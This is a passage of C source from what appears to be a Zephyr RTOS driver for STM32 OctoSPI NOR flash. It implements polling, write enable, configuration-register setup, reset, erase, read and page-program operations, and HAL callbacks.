cmd.DummyCycles = ((dev_cfg->data_mode == OSPI_SPI_MODE) ? 8U : 20U);
cmd.NbData = size;
HAL_StatusTypeDef hal_ret;
hal_ret = HAL_OSPI_Command(&dev_data->hospi, &cmd,
HAL_OSPI_TIMEOUT_DEFAULT_VALUE);
if (hal_ret != HAL_OK) {
LOG_ERR("%d: Failed to send OSPI instruction", hal_ret);
return -EIO;
}
hal_ret = HAL_OSPI_Receive(&dev_data->hospi, data, HAL_OSPI_TIMEOUT_DEFAULT_VALUE);
if (hal_ret != HAL_OK) {
LOG_ERR("%d: Failed to read data", hal_ret);
return -EIO;
}
#endif /* sfdp_bfp */
dev_data->cmd_status = 0;
return 0;
}
static bool ospi_address_is_valid(const struct device *dev, off_t addr,
size_t size)
{
const struct flash_stm32_ospi_config *dev_cfg = dev->config;
size_t flash_size = dev_cfg->flash_size;
return (addr >= 0) && ((uint64_t)addr + (uint64_t)size <= flash_size);
}
/*
* This function Polls the WIP(Write In Progress) bit to become to 0
* in nor_mode SPI/OPI OSPI_SPI_MODE or OSPI_OPI_MODE
* and nor_rate transfer STR/DTR OSPI_STR_TRANSFER or OSPI_DTR_TRANSFER
*/
static int stm32_ospi_mem_ready(OSPI_HandleTypeDef *hospi, uint8_t nor_mode, uint8_t nor_rate)
{
OSPI_AutoPollingTypeDef s_config = {0};
OSPI_RegularCmdTypeDef s_command = ospi_prepare_cmd(nor_mode, nor_rate);
/* Configure automatic polling mode command to wait for memory ready */
s_command.Instruction = (nor_mode == OSPI_SPI_MODE)
? SPI_NOR_CMD_RDSR
: SPI_NOR_OCMD_RDSR;
s_command.Address = 0;
s_command.DummyCycles = (nor_mode == OSPI_SPI_MODE)
? 0U
: ((nor_rate == OSPI_DTR_TRANSFER)
? SPI_NOR_DUMMY_REG_OCTAL_DTR
: SPI_NOR_DUMMY_REG_OCTAL);
s_command.NbData = (nor_rate == OSPI_DTR_TRANSFER) ? 2U : 1U;
/* Set the mask to 0x01 to mask all Status REG bits except WIP */
/* Set the match to 0x00 to check if the WIP bit is Reset */
s_config.Match = SPI_NOR_MEM_RDY_MATCH;
s_config.Mask = SPI_NOR_MEM_RDY_MASK; /* Write in progress */
s_config.MatchMode = HAL_OSPI_MATCH_MODE_AND;
s_config.Interval = SPI_NOR_AUTO_POLLING_INTERVAL;
s_config.AutomaticStop = HAL_OSPI_AUTOMATIC_STOP_ENABLE;
if (HAL_OSPI_Command(hospi, &s_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI AutoPoll command failed");
return -EIO;
}
/* Start Automatic-Polling mode to wait until the memory is ready WIP=0 */
if (HAL_OSPI_AutoPolling(hospi, &s_config, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI AutoPoll failed");
return -EIO;
}
return 0;
}
/* Enables writing to the memory sending a Write Enable and wait it is effective */
static int stm32_ospi_write_enable(OSPI_HandleTypeDef *hospi, uint8_t nor_mode, uint8_t nor_rate)
{
OSPI_AutoPollingTypeDef s_config = {0};
OSPI_RegularCmdTypeDef s_command = ospi_prepare_cmd(nor_mode, nor_rate);
/* Initialize the write enable command */
s_command.Instruction = (nor_mode == OSPI_SPI_MODE)
? SPI_NOR_CMD_WREN
: SPI_NOR_OCMD_WREN;
s_command.AddressMode = HAL_OSPI_ADDRESS_NONE;
s_command.DataMode = HAL_OSPI_DATA_NONE;
s_command.DummyCycles = 0U;
if (HAL_OSPI_Command(hospi, &s_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI flash write enable cmd failed");
return -EIO;
}
/* Configure automatic polling mode to wait for write enabling */
s_command.Instruction = (nor_mode == OSPI_SPI_MODE)
? SPI_NOR_CMD_RDSR
: SPI_NOR_OCMD_RDSR;
s_command.AddressMode = (nor_mode == OSPI_SPI_MODE)
? HAL_OSPI_ADDRESS_1_LINE
: HAL_OSPI_ADDRESS_8_LINES;
s_command.Address = 0U;
s_command.DummyCycles = (nor_mode == OSPI_SPI_MODE)
? 0U
: ((nor_rate == OSPI_DTR_TRANSFER)
? SPI_NOR_DUMMY_REG_OCTAL_DTR
: SPI_NOR_DUMMY_REG_OCTAL);
s_command.DataMode = (nor_mode == OSPI_SPI_MODE)
? HAL_OSPI_DATA_1_LINE
: HAL_OSPI_DATA_8_LINES;
s_command.NbData = (nor_rate == OSPI_DTR_TRANSFER) ? 2U : 1U;
if (HAL_OSPI_Command(hospi, &s_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI config auto polling cmd failed");
return -EIO;
}
s_config.Match = SPI_NOR_WREN_MATCH;
s_config.Mask = SPI_NOR_WREN_MASK;
s_config.MatchMode = HAL_OSPI_MATCH_MODE_AND;
s_config.Interval = SPI_NOR_AUTO_POLLING_INTERVAL;
s_config.AutomaticStop = HAL_OSPI_AUTOMATIC_STOP_ENABLE;
if (HAL_OSPI_AutoPolling(hospi, &s_config, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI config auto polling failed");
return -EIO;
}
return 0;
}
/* Write Flash configuration register 2 with new dummy cycles */
static int stm32_ospi_write_cfg2reg_dummy(OSPI_HandleTypeDef *hospi,
uint8_t nor_mode, uint8_t nor_rate)
{
uint8_t transmit_data = SPI_NOR_CR2_DUMMY_CYCLES_66MHZ;
OSPI_RegularCmdTypeDef s_command = ospi_prepare_cmd(nor_mode, nor_rate);
/* Initialize the writing of configuration register 2 */
s_command.Instruction = (nor_mode == OSPI_SPI_MODE)
? SPI_NOR_CMD_WR_CFGREG2
: SPI_NOR_OCMD_WR_CFGREG2;
s_command.Address = SPI_NOR_REG2_ADDR3;
s_command.DummyCycles = 0U;
s_command.NbData = (nor_mode == OSPI_SPI_MODE) ? 1U
: ((nor_rate == OSPI_DTR_TRANSFER) ? 2U : 1U);
if (HAL_OSPI_Command(hospi, &s_command,
HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI transmit ");
return -EIO;
}
if (HAL_OSPI_Transmit(hospi, &transmit_data,
HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI transmit ");
return -EIO;
}
return 0;
}
/* Write Flash configuration register 2 with new single or octal SPI protocol */
static int stm32_ospi_write_cfg2reg_io(OSPI_HandleTypeDef *hospi,
uint8_t nor_mode, uint8_t nor_rate, uint8_t op_enable)
{
OSPI_RegularCmdTypeDef s_command = ospi_prepare_cmd(nor_mode, nor_rate);
/* Initialize the writing of configuration register 2 */
s_command.Instruction = (nor_mode == OSPI_SPI_MODE)
? SPI_NOR_CMD_WR_CFGREG2
: SPI_NOR_OCMD_WR_CFGREG2;
s_command.Address = SPI_NOR_REG2_ADDR1;
s_command.DummyCycles = 0U;
s_command.NbData = (nor_mode == OSPI_SPI_MODE) ? 1U
: ((nor_rate == OSPI_DTR_TRANSFER) ? 2U : 1U);
if (HAL_OSPI_Command(hospi, &s_command,
HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("Write Flash configuration reg2 failed");
return -EIO;
}
if (HAL_OSPI_Transmit(hospi, &op_enable,
HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("Write Flash configuration reg2 failed");
return -EIO;
}
return 0;
}
/* Read Flash configuration register 2 with new single or octal SPI protocol */
static int stm32_ospi_read_cfg2reg(OSPI_HandleTypeDef *hospi,
uint8_t nor_mode, uint8_t nor_rate, uint8_t *value)
{
OSPI_RegularCmdTypeDef s_command = ospi_prepare_cmd(nor_mode, nor_rate);
/* Initialize the writing of configuration register 2 */
s_command.Instruction = (nor_mode == OSPI_SPI_MODE)
? SPI_NOR_CMD_RD_CFGREG2
: SPI_NOR_OCMD_RD_CFGREG2;
s_command.Address = SPI_NOR_REG2_ADDR1;
s_command.DummyCycles = (nor_mode == OSPI_SPI_MODE)
? 0U
: ((nor_rate == OSPI_DTR_TRANSFER)
? SPI_NOR_DUMMY_REG_OCTAL_DTR
: SPI_NOR_DUMMY_REG_OCTAL);
s_command.NbData = (nor_rate == OSPI_DTR_TRANSFER) ? 2U : 1U;
if (HAL_OSPI_Command(hospi, &s_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("Write Flash configuration reg2 failed");
return -EIO;
}
if (HAL_OSPI_Receive(hospi, value, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("Write Flash configuration reg2 failed");
return -EIO;
}
return 0;
}
/* Set the NOR Flash to desired Interface mode : SPI/OSPI and STR/DTR according to the DTS */
static int stm32_ospi_config_mem(const struct device *dev)
{
const struct flash_stm32_ospi_config *dev_cfg = dev->config;
struct flash_stm32_ospi_data *dev_data = dev->data;
uint8_t reg[2];
/* Going to set the SPI mode and STR transfer rate : done */
if ((dev_cfg->data_mode == OSPI_SPI_MODE)
&& (dev_cfg->data_rate == OSPI_STR_TRANSFER)) {
LOG_INF("OSPI flash config is SPI / STR");
return 0;
}
/* Going to set the OPI mode (STR or DTR transfer rate) */
LOG_DBG("OSPI configuring OctoSPI mode");
if (stm32_ospi_write_enable(&dev_data->hospi,
OSPI_SPI_MODE, OSPI_STR_TRANSFER) != 0) {
LOG_ERR("OSPI write Enable failed");
return -EIO;
}
/* Write Configuration register 2 (with new dummy cycles) */
if (stm32_ospi_write_cfg2reg_dummy(&dev_data->hospi,
OSPI_SPI_MODE, OSPI_STR_TRANSFER) != 0) {
LOG_ERR("OSPI write CFGR2 failed");
return -EIO;
}
if (stm32_ospi_mem_ready(&dev_data->hospi,
OSPI_SPI_MODE, OSPI_STR_TRANSFER) != 0) {
LOG_ERR("OSPI autopolling failed");
return -EIO;
}
if (stm32_ospi_write_enable(&dev_data->hospi,
OSPI_SPI_MODE, OSPI_STR_TRANSFER) != 0) {
LOG_ERR("OSPI write Enable 2 failed");
return -EIO;
}
/* Write Configuration register 2 (with Octal I/O SPI protocol : choose STR or DTR) */
uint8_t mode_enable = ((dev_cfg->data_rate == OSPI_DTR_TRANSFER)
? SPI_NOR_CR2_DTR_OPI_EN
: SPI_NOR_CR2_STR_OPI_EN);
if (stm32_ospi_write_cfg2reg_io(&dev_data->hospi,
OSPI_SPI_MODE, OSPI_STR_TRANSFER, mode_enable) != 0) {
LOG_ERR("OSPI write CFGR2 failed");
return -EIO;
}
/* Wait that the configuration is effective and check that memory is ready */
k_msleep(STM32_OSPI_WRITE_REG_MAX_TIME);
/* Reconfigure the memory type of the peripheral */
dev_data->hospi.Init.MemoryType = HAL_OSPI_MEMTYPE_MACRONIX;
dev_data->hospi.Init.DelayHoldQuarterCycle = HAL_OSPI_DHQC_ENABLE;
if (HAL_OSPI_Init(&dev_data->hospi) != HAL_OK) {
LOG_ERR("OSPI mem type MACRONIX failed");
return -EIO;
}
if (dev_cfg->data_rate == OSPI_STR_TRANSFER) {
if (stm32_ospi_mem_ready(&dev_data->hospi,
OSPI_OPI_MODE, OSPI_STR_TRANSFER) != 0) {
/* Check Flash busy ? */
LOG_ERR("OSPI flash busy failed");
return -EIO;
}
if (stm32_ospi_read_cfg2reg(&dev_data->hospi,
OSPI_OPI_MODE, OSPI_STR_TRANSFER, reg) != 0) {
/* Check the configuration has been correctly done on SPI_NOR_REG2_ADDR1 */
LOG_ERR("OSPI flash config read failed");
return -EIO;
}
LOG_INF("OSPI flash config is OPI / STR");
}
if (dev_cfg->data_rate == OSPI_DTR_TRANSFER) {
if (stm32_ospi_mem_ready(&dev_data->hospi,
OSPI_OPI_MODE, OSPI_DTR_TRANSFER) != 0) {
/* Check Flash busy ? */
LOG_ERR("OSPI flash busy failed");
return -EIO;
}
LOG_INF("OSPI flash config is OPI / DTR");
}
return 0;
}
/* gpio or send the different reset command to the NOR flash in SPI/OSPI and STR/DTR */
static int stm32_ospi_mem_reset(const struct device *dev)
{
struct flash_stm32_ospi_data *dev_data = dev->data;
#if STM32_OSPI_RESET_GPIO
/* Generate RESETn pulse for the flash memory */
gpio_pin_configure_dt(&dev_cfg->reset, GPIO_OUTPUT_ACTIVE);
k_msleep(DT_INST_PROP(0, reset_gpios_duration));
gpio_pin_set_dt(&dev_cfg->reset, 0);
#else
/* Reset command sent sucessively for each mode SPI/OPS & STR/DTR */
OSPI_RegularCmdTypeDef s_command = {
.OperationType = HAL_OSPI_OPTYPE_COMMON_CFG,
.FlashId = HAL_OSPI_FLASH_ID_1,
.AddressMode = HAL_OSPI_ADDRESS_NONE,
.InstructionMode = HAL_OSPI_INSTRUCTION_1_LINE,
.InstructionDtrMode = HAL_OSPI_INSTRUCTION_DTR_DISABLE,
.Instruction = SPI_NOR_CMD_RESET_EN,
.InstructionSize = HAL_OSPI_INSTRUCTION_8_BITS,
.AlternateBytesMode = HAL_OSPI_ALTERNATE_BYTES_NONE,
.DataMode = HAL_OSPI_DATA_NONE,
.DummyCycles = 0U,
.DQSMode = HAL_OSPI_DQS_DISABLE,
.SIOOMode = HAL_OSPI_SIOO_INST_EVERY_CMD,
};
/* Reset enable in SPI mode and STR transfer mode */
if (HAL_OSPI_Command(&dev_data->hospi,
&s_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI reset enable (SPI/STR) failed");
return -EIO;
}
/* Reset memory in SPI mode and STR transfer mode */
s_command.Instruction = SPI_NOR_CMD_RESET_MEM;
if (HAL_OSPI_Command(&dev_data->hospi,
&s_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI reset memory (SPI/STR) failed");
return -EIO;
}
/* Reset enable in OPI mode and STR transfer mode */
s_command.InstructionMode = HAL_OSPI_INSTRUCTION_8_LINES;
s_command.InstructionDtrMode = HAL_OSPI_INSTRUCTION_DTR_DISABLE;
s_command.Instruction = SPI_NOR_OCMD_RESET_EN;
s_command.InstructionSize = HAL_OSPI_INSTRUCTION_16_BITS;
if (HAL_OSPI_Command(&dev_data->hospi,
&s_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI reset enable (OPI/STR) failed");
return -EIO;
}
/* Reset memory in OPI mode and STR transfer mode */
s_command.Instruction = SPI_NOR_OCMD_RESET_MEM;
if (HAL_OSPI_Command(&dev_data->hospi,
&s_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI reset memory (OPI/STR) failed");
return -EIO;
}
/* Reset enable in OPI mode and DTR transfer mode */
s_command.InstructionDtrMode = HAL_OSPI_INSTRUCTION_DTR_ENABLE;
s_command.Instruction = SPI_NOR_OCMD_RESET_EN;
if (HAL_OSPI_Command(&dev_data->hospi,
&s_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI reset enable (OPI/DTR) failed");
return -EIO;
}
/* Reset memory in OPI mode and DTR transfer mode */
s_command.Instruction = SPI_NOR_OCMD_RESET_MEM;
if (HAL_OSPI_Command(&dev_data->hospi,
&s_command, HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI reset memory (OPI/DTR) failed");
return -EIO;
}
#endif
/* After SWreset CMD, wait in case SWReset occurred during erase operation */
k_msleep(STM32_OSPI_RESET_MAX_TIME);
return 0;
}
/*
* Function to erase the flash : chip or sector with possible OSPI/SPI and STR/DTR
* to erase the complete chip (using dedicated command) :
* set size >= flash size
* set addr = 0
*/
static int flash_stm32_ospi_erase(const struct device *dev, off_t addr,
size_t size)
{
const struct flash_stm32_ospi_config *dev_cfg = dev->config;
struct flash_stm32_ospi_data *dev_data = dev->data;
int ret = 0;
/* Ignore zero size erase */
if (size == 0) {
return 0;
}
/* Maximise erase size : means the complete chip */
if (size > dev_cfg->flash_size) {
/* Reset addr in that case */
addr = 0;
size = dev_cfg->flash_size;
}
if (!ospi_address_is_valid(dev, addr, size)) {
LOG_ERR("Error: address or size exceeds expected values: "
"addr 0x%lx, size %zu", (long)addr, size);
return -EINVAL;
}
if ((size != SPI_NOR_SECTOR_SIZE) && (size < dev_cfg->flash_size)) {
LOG_ERR("Error: wrong sector size 0x%x", size);
return -ENOTSUP;
}
OSPI_RegularCmdTypeDef cmd_erase = {
.OperationType = HAL_OSPI_OPTYPE_COMMON_CFG,
.FlashId = HAL_OSPI_FLASH_ID_1,
.AlternateBytesMode = HAL_OSPI_ALTERNATE_BYTES_NONE,
.DataMode = HAL_OSPI_DATA_NONE,
.DummyCycles = 0,
.DQSMode = HAL_OSPI_DQS_DISABLE,
.SIOOMode = HAL_OSPI_SIOO_INST_EVERY_CMD,
};
ospi_lock_thread(dev);
if (stm32_ospi_mem_ready(&dev_data->hospi,
dev_cfg->data_mode, dev_cfg->data_rate) != 0) {
LOG_ERR("Erase failed : flash busy");
return -EBUSY;
}
if (stm32_ospi_write_enable(&dev_data->hospi,
dev_cfg->data_mode, dev_cfg->data_rate) != 0) {
LOG_ERR("Erase failed : write enable");
return -EIO;
}
cmd_erase.InstructionMode = (dev_cfg->data_mode == OSPI_SPI_MODE)
? HAL_OSPI_INSTRUCTION_1_LINE
: HAL_OSPI_INSTRUCTION_8_LINES;
cmd_erase.InstructionDtrMode = (dev_cfg->data_rate == OSPI_DTR_TRANSFER)
? HAL_OSPI_INSTRUCTION_DTR_ENABLE
: HAL_OSPI_INSTRUCTION_DTR_DISABLE;
cmd_erase.InstructionSize = (dev_cfg->data_mode == OSPI_SPI_MODE)
? HAL_OSPI_INSTRUCTION_8_BITS
: HAL_OSPI_INSTRUCTION_16_BITS;
while ((size > 0) && (ret == 0)) {
if (size == dev_cfg->flash_size) {
/* Chip erase */
LOG_INF("Chip Erase");
cmd_erase.Instruction = (dev_cfg->data_mode == OSPI_SPI_MODE)
? SPI_NOR_CMD_BULKE
: SPI_NOR_OCMD_BULKE;
cmd_erase.AddressMode = HAL_OSPI_ADDRESS_NONE;
/* Full chip erase command */
ospi_send_cmd(dev, &cmd_erase);
size -= dev_cfg->flash_size;
} else {
/* Sector erase */
LOG_INF("Sector Erase");
cmd_erase.Address = addr;
const struct jesd216_erase_type *erase_types =
dev_data->erase_types;
const struct jesd216_erase_type *bet = NULL;
for (uint8_t ei = 0;
ei < JESD216_NUM_ERASE_TYPES; ++ei) {
const struct jesd216_erase_type *etp =
&erase_types[ei];
if ((etp->exp != 0)
&& SPI_NOR_IS_ALIGNED(addr, etp->exp)
&& SPI_NOR_IS_ALIGNED(size, etp->exp)
&& ((bet == NULL)
|| (etp->exp > bet->exp))) {
bet = etp;
cmd_erase.Instruction = bet->cmd;
} else {
/* Use the default sector erase cmd */
cmd_erase.Instruction =
(dev_cfg->data_mode == OSPI_SPI_MODE)
? SPI_NOR_CMD_SE /* Erase sector size 3 bytes */
: SPI_NOR_OCMD_SE;
cmd_erase.AddressMode =
(dev_cfg->data_mode == OSPI_SPI_MODE)
? HAL_OSPI_ADDRESS_1_LINE
: HAL_OSPI_ADDRESS_8_LINES;
cmd_erase.AddressDtrMode =
(dev_cfg->data_rate == OSPI_DTR_TRANSFER)
? HAL_OSPI_ADDRESS_DTR_ENABLE
: HAL_OSPI_ADDRESS_DTR_DISABLE;
cmd_erase.AddressSize = HAL_OSPI_ADDRESS_32_BITS;
cmd_erase.Address = addr;
}
}
ospi_send_cmd(dev, &cmd_erase);
if (bet != NULL) {
addr += BIT(bet->exp);
size -= BIT(bet->exp);
} else {
addr += SPI_NOR_SECTOR_SIZE;
size -= SPI_NOR_SECTOR_SIZE;
}
ret = stm32_ospi_mem_ready(&dev_data->hospi,
dev_cfg->data_mode, dev_cfg->data_rate);
}
}
ospi_unlock_thread(dev);
return ret;
}
/* Function to read the flash with possible OSPI/SPI and STR/DTR */
static int flash_stm32_ospi_read(const struct device *dev, off_t addr,
void *data, size_t size)
{
const struct flash_stm32_ospi_config *dev_cfg = dev->config;
int ret;
if (!ospi_address_is_valid(dev, addr, size)) {
LOG_ERR("Error: address or size exceeds expected values: "
"addr 0x%lx, size %zu", (long)addr, size);
return -EINVAL;
}
/* Ignore zero size read */
if (size == 0) {
return 0;
}
OSPI_RegularCmdTypeDef cmd = ospi_prepare_cmd(dev_cfg->data_mode, dev_cfg->data_rate);
/* Instruction and DummyCycles are set below */
cmd.Address = addr;
/* DataSize is set by the read cmd */
LOG_DBG("OSPI: read %u data", size);
ospi_lock_thread(dev);
/* Configure other parameters */
if (dev_cfg->data_rate == OSPI_DTR_TRANSFER) {
/* DTR transfer rate (==> Octal mode) */
cmd.Instruction = SPI_NOR_OCMD_DTR_RD;
cmd.DummyCycles = SPI_NOR_DUMMY_RD_OCTAL_DTR;
} else {
/* STR transfer rate */
if (dev_cfg->data_mode == OSPI_SPI_MODE) {
/* SPI and STR : use fast read with addr on 4 bytes */
cmd.Instruction = SPI_NOR_CMD_READ_FAST_4B;
cmd.DummyCycles = SPI_NOR_DUMMY_RD;
} else {
/* OPI and STR */
cmd.Instruction = SPI_NOR_OCMD_RD;
cmd.DummyCycles = SPI_NOR_DUMMY_RD_OCTAL;
}
}
ret = ospi_read_access(dev, &cmd, data, size);
ospi_unlock_thread(dev);
return ret;
}
/* Function to write the flash (page program) : with possible OSPI/SPI and STR/DTR */
static int flash_stm32_ospi_write(const struct device *dev, off_t addr,
const void *data, size_t size)
{
const struct flash_stm32_ospi_config *dev_cfg = dev->config;
struct flash_stm32_ospi_data *dev_data = dev->data;
int ret = 0;
if (!ospi_address_is_valid(dev, addr, size)) {
LOG_ERR("Error: address or size exceeds expected values: "
"addr 0x%lx, size %zu", (long)addr, size);
return -EINVAL;
}
/* Ignore zero size write */
if (size == 0) {
return 0;
}
/* page program for STR or DTR mode */
OSPI_RegularCmdTypeDef cmd_pp = ospi_prepare_cmd(dev_cfg->data_mode, dev_cfg->data_rate);
cmd_pp.DummyCycles = 0;
LOG_INF("OSPI: write %u data", size);
ospi_lock_thread(dev);
while ((size > 0) && (ret == 0)) {
size_t to_write = size;
ret = stm32_ospi_mem_ready(&dev_data->hospi,
dev_cfg->data_mode, dev_cfg->data_rate);
if (ret != 0) {
break;
}
ret = stm32_ospi_write_enable(&dev_data->hospi,
dev_cfg->data_mode, dev_cfg->data_rate);
if (ret != 0) {
break;
}
/* Don't write more than a page. */
if (to_write >= SPI_NOR_PAGE_SIZE) {
to_write = SPI_NOR_PAGE_SIZE;
}
/* Don't write across a page boundary */
if (((addr + to_write - 1U) / SPI_NOR_PAGE_SIZE)
!= (addr / SPI_NOR_PAGE_SIZE)) {
to_write = SPI_NOR_PAGE_SIZE -
(addr % SPI_NOR_PAGE_SIZE);
}
cmd_pp.Instruction = (dev_cfg->data_mode == OSPI_SPI_MODE)
? SPI_NOR_CMD_PP_4B
: SPI_NOR_OCMD_PAGE_PRG;
cmd_pp.Address = addr;
ret = ospi_write_access(dev, &cmd_pp, data, to_write);
if (ret != 0) {
break;
}
size -= to_write;
data = (const uint8_t *)data + to_write;
addr += to_write;
/* Configure automatic polling mode to wait for end of program */
ret = stm32_ospi_mem_ready(&dev_data->hospi,
dev_cfg->data_mode, dev_cfg->data_rate);
if (ret != 0) {
break;
}
}
ospi_unlock_thread(dev);
return ret;
}
static const struct flash_parameters flash_stm32_ospi_parameters = {
.write_block_size = 1,
.erase_value = 0xff
};
static const struct flash_parameters *
flash_stm32_ospi_get_parameters(const struct device *dev)
{
ARG_UNUSED(dev);
return &flash_stm32_ospi_parameters;
}
static void flash_stm32_ospi_isr(const struct device *dev)
{
struct flash_stm32_ospi_data *dev_data = dev->data;
HAL_OSPI_IRQHandler(&dev_data->hospi);
}
/* weak function required for HAL compilation */
__weak HAL_StatusTypeDef HAL_DMA_Abort_IT(DMA_HandleTypeDef *hdma)
{
return HAL_OK;
}
/* weak function required for HAL compilation */
__weak HAL_StatusTypeDef HAL_DMA_Abort(DMA_HandleTypeDef *hdma)
{
return HAL_OK;
}
/*
* Transfer Error callback.
*/
void HAL_OSPI_ErrorCallback(OSPI_HandleTypeDef *hospi)
{
struct flash_stm32_ospi_data *dev_data =
CONTAINER_OF(hospi, struct flash_stm32_ospi_data, hospi);
LOG_DBG("Error cb");
dev_data->cmd_status = -EIO;
k_sem_give(&dev_data->sync);
}
/*
* Command completed callback.
*/
void HAL_OSPI_CmdCpltCallback(OSPI_HandleTypeDef *hospi)
{
struct flash_stm32_ospi_data *dev_data =
CONTAINER_OF(hospi, struct flash_stm32_ospi_data, hospi);
LOG_DBG("Cmd Cplt cb");
k_sem_give(&dev_data->sync);
}
/*
* Rx Transfer completed callback.
*/
void HAL_OSPI_RxCpltCallback(OSPI_HandleTypeDef *hospi)
{
struct flash_stm32_ospi_data *dev_data =
CONTAINER_OF(hospi, struct flash_stm32_ospi_data, hospi);
LOG_DBG("Rx Cplt cb");
k_sem_give(&dev_data->sync);
}
/*
* Tx Transfer completed callback.
*/
void HAL_OSPI_TxCpltCallback(OSPI_HandleTypeDef *hospi)
{
struct flash_stm32_ospi_data *dev_data =
CONTAINER_OF(hospi, struct flash_stm32_ospi_data, hospi);
LOG_DBG("Tx Cplt cb");
k_sem_give(&dev_data->sync);
}
/*
* Status Match callback.
*/
void HAL_OSPI_StatusMatchCallback(OSPI_HandleTypeDef *hospi)
{
struct flash_stm32_ospi_data *dev_data =
CONTAINER_OF(hospi, struct flash_stm32_ospi_data, hospi);
LOG_DBG("Status Match cb");
k_sem_give(&dev_data->sync);
}
/*
* Timeout callback.
*/
void HAL_OSPI_TimeOutCallback(OSPI_HandleTypeDef *hospi)
{
struct flash_stm32_ospi_data *dev_data =
CONTAINER_OF(hospi, struct flash_stm32_ospi_data, hospi);
LOG_DBG("Timeout cb");
dev_data->cmd_status = -EIO;
k_sem_give(&dev_data->sync);
}
#if defined(CONFIG_FLASH_PAGE_LAYOUT)
static void flash_stm32_ospi_pages_layout(const struct device *dev,
const struct flash_pages_layout **layout,
size_t *layout_size)
{
struct flash_stm32_ospi_data *dev_data = dev->data;
*layout = &dev_data->layout;
*layout_size = 1;
}
#endif
static const struct flash_driver_api flash_stm32_ospi_driver_api = {
.read = flash_stm32_ospi_read,
.write = flash_stm32_ospi_write,
.erase = flash_stm32_ospi_erase,
.get_parameters = flash_stm32_ospi_get_parameters,
#if defined(CONFIG_FLASH_PAGE_LAYOUT)
.page_layout = flash_stm32_ospi_pages_layout,
#endif
};
#if defined(CONFIG_FLASH_PAGE_LAYOUT)
static int setup_pages_layout(const struct device *dev)
{
const struct flash_stm32_ospi_config *dev_cfg = dev->config;
struct flash_stm32_ospi_data *data = dev->data;
const size_t flash_size = dev_cfg->flash_size;
uint32_t layout_page_size = data->page_size;
uint8_t value = 0;
int rv = 0;
/* Find the smallest erase size. */
for (size_t i = 0; i < ARRAY_SIZE(data->erase_types); ++i) {
const struct jesd216_erase_type *etp = &data->erase_types[i];
if ((etp->cmd != 0)
&& ((value == 0) || (etp->exp < value))) {
value = etp->exp;
}
}
uint32_t erase_size = BIT(value);
if (erase_size == 0) {
erase_size = SPI_NOR_SECTOR_SIZE;
}
/* We need layout page size to be compatible with erase size */
if ((layout_page_size % erase_size) != 0) {
LOG_DBG("layout page %u not compatible with erase size %u",
layout_page_size, erase_size);
LOG_DBG("erase size will be used as layout page size");
layout_page_size = erase_size;
}
/* Warn but accept layout page sizes that leave inaccessible
* space.
*/
if ((flash_size % layout_page_size) != 0) {
LOG_DBG("layout page %u wastes space with device size %zu",
layout_page_size, flash_size);
}
data->layout.pages_size = layout_page_size;
data->layout.pages_count = flash_size / layout_page_size;
LOG_DBG("layout %u x %u By pages", data->layout.pages_count,
data->layout.pages_size);
return rv;
}
#endif /* CONFIG_FLASH_PAGE_LAYOUT */
static int spi_nor_process_bfp(const struct device *dev,
const struct jesd216_param_header *php,
const struct jesd216_bfp *bfp)
{
const struct flash_stm32_ospi_config *dev_cfg = dev->config;
struct flash_stm32_ospi_data *data = dev->data;
struct jesd216_erase_type *etp = data->erase_types;
const size_t flash_size = jesd216_bfp_density(bfp) / 8U;
if (flash_size != dev_cfg->flash_size) {
LOG_DBG("Unexpected flash size: %u", flash_size);
}
LOG_DBG("%s: %u MiBy flash", dev->name, (uint32_t)(flash_size >> 20));
/* Copy over the erase types, preserving their order. (The
* Sector Map Parameter table references them by index.)
*/
memset(data->erase_types, 0, sizeof(data->erase_types));
for (uint8_t ti = 1; ti <= ARRAY_SIZE(data->erase_types); ++ti) {
if (jesd216_bfp_erase(bfp, ti, etp) == 0) {
LOG_DBG("Erase %u with %02x",
(uint32_t)BIT(etp->exp), etp->cmd);
}
++etp;
}
data->page_size = jesd216_bfp_page_size(php, bfp);
LOG_DBG("Page size %u bytes", data->page_size);
LOG_DBG("Flash size %u bytes", flash_size);
return 0;
}
static int flash_stm32_ospi_init(const struct device *dev)
{
const struct flash_stm32_ospi_config *dev_cfg = dev->config;
struct flash_stm32_ospi_data *dev_data = dev->data;
uint32_t ahb_clock_freq;
uint32_t prescaler = 0;
int ret;
/* The SPI/DTR is not a valid config of data_mode/data_rate according to the DTS */
if ((dev_cfg->data_mode == OSPI_SPI_MODE)
&& (dev_cfg->data_rate == OSPI_DTR_TRANSFER)) {
/* already the right config, continue */
LOG_ERR("OSPI mode SPI/DTR is not valid");
return -ENOTSUP;
}
/* Signals configuration */
ret = pinctrl_apply_state(dev_cfg->pcfg, PINCTRL_STATE_DEFAULT);
if (ret < 0) {
LOG_ERR("OSPI pinctrl setup failed (%d)", ret);
return ret;
}
/* Initializes the independent peripherals clock */
__HAL_RCC_OSPI_CONFIG(RCC_OSPICLKSOURCE_SYSCLK); /* */
/* Clock configuration */
